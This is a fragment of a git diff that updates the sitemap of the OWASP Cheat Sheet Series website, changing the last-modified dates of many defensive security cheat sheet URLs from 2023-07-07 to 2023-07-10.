2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Authorization_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Bean_Validation_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Database_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Django_REST_Framework_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Error_Handling_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_in_Java_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/JAAS_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Java_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Key_Management_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Kubernetes_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Laravel_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Logging_Vocabulary_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Microservices_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Multifactor_Authentication_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/NPM_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Network_Segmentation_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/NodeJS_Docker_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/PHP_Configuration_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Pinning_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/REST_Assessment_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Ruby_on_Rails_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/SAML_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Secure_Product_Design_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/TLS_Cipher_String_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Threat_Modeling_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Transaction_Authorization_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/User_Privacy_Protection_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Virtual_Patching_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/Web_Service_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily https://cheatsheetseries.owasp.org/cheatsheets/XS_Leaks_Cheat_Sheet.html - 2023-07-07 + 2023-07-10 daily \ No newline at end of file diff --git a/sitemap.xml.gz b/sitemap.xml.gz index 29e5121101..b4da4728d7 100644 Binary files a/sitemap.xml.gz and b/sitemap.xml.gz differ